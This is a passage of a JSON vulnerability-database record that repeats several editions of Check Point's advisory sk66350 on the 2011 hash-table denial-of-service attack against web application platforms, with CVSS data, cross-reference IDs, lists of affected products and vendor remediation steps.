"modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-18T15:10:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4885", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885", "CVE-2011-3414"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30071", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:30001", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:71568", "OPENVAS:863921", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122002", "OPENVAS:863681", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881167", "OPENVAS:831554", "OPENVAS:870638", "OPENVAS:881167", "OPENVAS:70754", "OPENVAS:881095", "OPENVAS:1361412562310120218", "OPENVAS:136141256231071568", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310863740", "OPENVAS:1361412562310831554", "OPENVAS:136141256231070754", "OPENVAS:864028", "OPENVAS:1361412562310881142", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310122012", "OPENVAS:1361412562310863681"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL13588.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2012-0504.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "CENTOS_RHSA-2012-0069.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0420.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2011-17542.NASL", "DEBIAN_DLA-209.NASL", "ALA_ALAS-2012-35.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3515C213E6", "FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:A38F421375"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0092", "RHSA-2012:0019", "RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-18T15:10:54", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-18T15:10:54", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-18T15:10:54", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-19T23:06:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:72454", "SSV:26126", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:881167", "OPENVAS:863921", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863740", "OPENVAS:1361412562310881149", "OPENVAS:70754", "OPENVAS:863735", "OPENVAS:881095", "OPENVAS:136141256231071568", "OPENVAS:870638", "OPENVAS:1361412562310863713", "OPENVAS:881142", "OPENVAS:1361412562310881142", "OPENVAS:1361412562310831554", "OPENVAS:831554", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310122001", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:71568", "OPENVAS:1361412562310863742"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "FEDORA_2012-1301.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17542.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "FEDORA_2012-0420.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "CENTOS_RHSA-2012-0019.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:A38F421375", "FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-19T23:06:52", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-19T23:06:52", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-19T23:06:52", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-20T07:10:41", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:71568", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310881167", "OPENVAS:863713", "OPENVAS:1361412562310863740", "OPENVAS:70754", "OPENVAS:870638", "OPENVAS:1361412562310881119", "OPENVAS:863921", "OPENVAS:863735", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310864015", "OPENVAS:136141256231071568", "OPENVAS:831554", "OPENVAS:1361412562310863824", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310881149", "OPENVAS:881167"]}, {"type": "nessus", "idList": ["SL_20120130_RUBY_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "REDHAT-RHSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0504.NASL", "DEBIAN_DLA-209.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2012-024.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-1262.NASL", "REDHAT-RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0069.NASL", "ALA_ALAS-2012-37.NASL", "F5_BIGIP_SOL13588.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0092", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019", "ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-20T07:10:41", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-20T07:10:41", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-20T07:10:41", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-21T11:11:12", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:72454", "SSV:30001", "SSV:26122", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:71568", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310870638", "OPENVAS:863681", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310881167", "OPENVAS:863713", "OPENVAS:1361412562310863740", "OPENVAS:70754", "OPENVAS:870638", "OPENVAS:1361412562310881119", "OPENVAS:863921", "OPENVAS:863735", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310864015", "OPENVAS:136141256231071568", "OPENVAS:831554", "OPENVAS:1361412562310863824", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310881149", "OPENVAS:881167"]}, {"type": "nessus", "idList": ["SL_20120130_RUBY_ON_SL6_X.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "REDHAT-RHSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0504.NASL", "DEBIAN_DLA-209.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2012-024.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2011-17542.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-1262.NASL", "REDHAT-RHSA-2012-0070.NASL", 